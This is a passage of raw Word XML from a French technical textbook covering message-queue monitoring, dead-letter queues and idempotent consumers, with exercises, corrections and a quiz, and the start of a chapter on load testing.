              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f98.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId140"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3175000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.98 — Un pipeline d'événements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>85.5 Exploiter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une file se surveille comme un service : profondeur, âge du plus ancien message, taux d'échec, nombre de réessais. Ces quatre indicateurs révèlent un consommateur trop lent ou bloqué.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.333 — Quatre indicateurs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87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Indicateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="287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Seuil d'alerte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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Interprétation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2874"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Profondeur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2874"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Croissance continue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3266"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Consommateur trop lent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="287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Âge du plus ancien</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="287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&gt; 5 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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Traitement en retard</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2874"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Taux d'échec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2874"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>&gt; 1 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3266"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cause de traitement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="287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Réessais</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="287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&gt; 3 par message</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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Message toxique probable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux diagnostics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Métriques CloudWatch d'une file SQS</w:t>
        <w:br/>
        <w:t>aws cloudwatch get-metric-statistics \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --namespace AWS/SQS --metric-name ApproximateAgeOfOldestMessage \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --dimensions Name=QueueName,Value=commandes \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --start-time 2026-10-19T00:00:00Z --end-time 2026-10-19T12:00:00Z \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --period 300 --statistics Maximum</w:t>
        <w:br/>
        <w:br/>
        <w:t># Inspecter la file de lettres mortes</w:t>
        <w:br/>
        <w:t>aws sqs receive-message --queue-url "$DLQ" --max-number-of-messages 5</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CONCEVOIR UNE FILE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Une clé métier qui garantit l'ordre utile.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Une limite de réessai et une file de lettres mortes.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 consommateur idempotent, testé par rejeu.</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Une rétention compatible avec le rejeu prévu.</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Une alerte sur l'âge du plus ancien message.</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file découple la disponibilité et lisse les pics.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journal se lit à sa propre position, sans consommer.</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 Au moins une fois » impose l'idempotence.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On acquitte après le traitement, jamais avant.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message toxique exige une limite de réessai.</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L'ordre se garantit par clé, pas globalement.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Quatre indicateurs suffisent à surveiller une file.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rétention doit couvrir le rejeu prévu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les services communiquent par messages. Le chapitre suivant mesure ce qu'ils peuvent supporter.</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85.1 — Configurer réessais et lettres mortes</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 consommateur échoue parfois sur des messages corrompus.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Ajoutez une limite.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Créez la file de lettres mortes.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le routage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 85.2 — Rendre un traitement rejouable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   FIABILITÉ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le même message peut arriver deux fois.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Ajoutez une clé.</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Rendez l'insertion conditionnelle.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Testez le rejeu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 85.3 — Diagnostiquer un retard</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L'âge du plus ancien message dépasse trente minutes.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Comparez débit entrant et sortant.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Cherchez un message bloquant.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Proposez une correction.</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85.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>aws sqs create-queue --queue-name commandes-dlq</w:t>
        <w:br/>
        <w:t>aws sqs create-queue --queue-name commandes \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --attributes '{</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "VisibilityTimeout": "60",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "RedrivePolicy": "{\"deadLetterTargetArn\":\"arn:aws:sqs:eu-west-3:123456789012:commandes-dlq\",\"maxReceiveCount\":\"5\"}"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }'</w:t>
        <w:br/>
        <w:br/>
        <w:t># Envoyer un message volontairement invalide, puis constater</w:t>
        <w:br/>
        <w:t>aws sqs get-queue-attributes --queue-url "$DLQ" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --attribute-names ApproximateNumberOfMessages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>maxReceiveCount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> compte les réceptions, pas les échecs métier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La file de lettres mortes doit elle-même être surveillée : y déposer un message est un signal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 85.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>def traiter(corps):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    with psycopg.connect(DSN) as conn, conn.cursor() as cur:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        cur.execute(</w:t>
        <w:br/>
        <w:t xml:space="preserve">            "INSERT INTO traitements (cle) VALUES (%s) "</w:t>
        <w:br/>
        <w:t xml:space="preserve">            "ON CONFLICT (cle) DO NOTHING RETURNING cle", (corps["cle"],))</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if cur.fetchone() is None:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            return "deja_traite"</w:t>
        <w:br/>
        <w:t xml:space="preserve">        cur.execute("UPDATE stock SET qte = qte - %s WHERE sku = %s",</w:t>
        <w:br/>
        <w:t xml:space="preserve">                    (corps["qte"], corps["sku"]))</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return "traite"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'insertion conditionnelle sert de verrou : une seule exécution passe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le test consiste à appeler deux fois la fonction avec le même corps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 85.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Entrant : 120 msg/min</w:t>
        <w:br/>
        <w:t>Sortant : 118 msg/min</w:t>
        <w:br/>
        <w:t>Âge du plus ancien : 34 min</w:t>
        <w:br/>
        <w:br/>
        <w:t>Hypothèse 1 : consommateur trop lent → augmenter le parallélisme</w:t>
        <w:br/>
        <w:t>Hypothèse 2 : message toxique → vérifier les réessais et la DLQ</w:t>
        <w:br/>
        <w:t>Hypothèse 3 : partition bloquée → inspecter le décalage par partition</w:t>
        <w:br/>
        <w:br/>
        <w:t>Décision : mesurer le temps de traitement par message avant d'ajouter</w:t>
        <w:br/>
        <w:t>des consommateurs ; si un message dépasse 10x la médiane, le sortir de la file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'écart de débit explique la croissance de la profondeur : 2 msg/min s'accumulent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ajouter des consommateurs ne résout pas un message qui bloque une partition.</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 garantit une file « au moins une fois »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Aucun doublon</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Aucune perte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Un ordre global</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Une latence nulle</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Quand faut-il acquitter un message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À la réception</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Après le traitement</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Jamais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Au redémarrage</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À quoi sert une file de lettres mortes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Accélérer</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Isoler les messages non traitables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Compresser</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Ordonner</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Comment garantir l'ordre utile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 seul consommateur</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Par clé métier</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Par heure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Par taille</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Quel indicateur révèle un consommateur bloqué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Le nombre de producteurs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L'âge du plus ancien message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La taille du disque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 nombre de partitions</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Le message peut être livré plusieurs fois, mais pas perdu.</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Un accusé trop tôt fait perdre le travail en cas de panne.</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Elle évite le blocage et permet l'analyse.</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Le partitionnement par clé conserve l'ordre de chaque entité.</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Il mesure le retard réel du traitement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>86. Tests de charge et performance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mesurer ce qu'un système supporte avant que les utilisateurs ne le découvrent à vos frais.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Avancé · Prérequis : chapitre 85</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Choisir un modèle de charge réaliste.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Écrire un scénario avec k6.</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Interpréter latence, débit et saturation.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Identifier le goulot d'étranglement.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Fixer un budget de performance testable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>86.1 Ce qu'on mesure vraiment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un test de charge ne mesure pas « la vitesse du site » : il mesure le comportement d'un système sous une charge donnée, avec un profil donné. Sans modèle de charge réaliste, le chiffre obtenu ne veut rien dire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.334 — Quatre grandeurs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42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Grandeur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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Définition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="322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Piège</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2422"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Débit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3363"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Requêtes par seconde</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3229"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Confondre avec le nombre d'utilisateurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="242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Latence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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Temps de réponse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="322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Moyenne qui cache la queue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2422"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Saturation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3363"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Utilisation d'une ressource</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3229"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Invisible avant la rupture</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="242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Taux d'erreur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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Réponses en échec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="322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Ignorer les délais dépassés</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MODÈLE DE CHARGE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
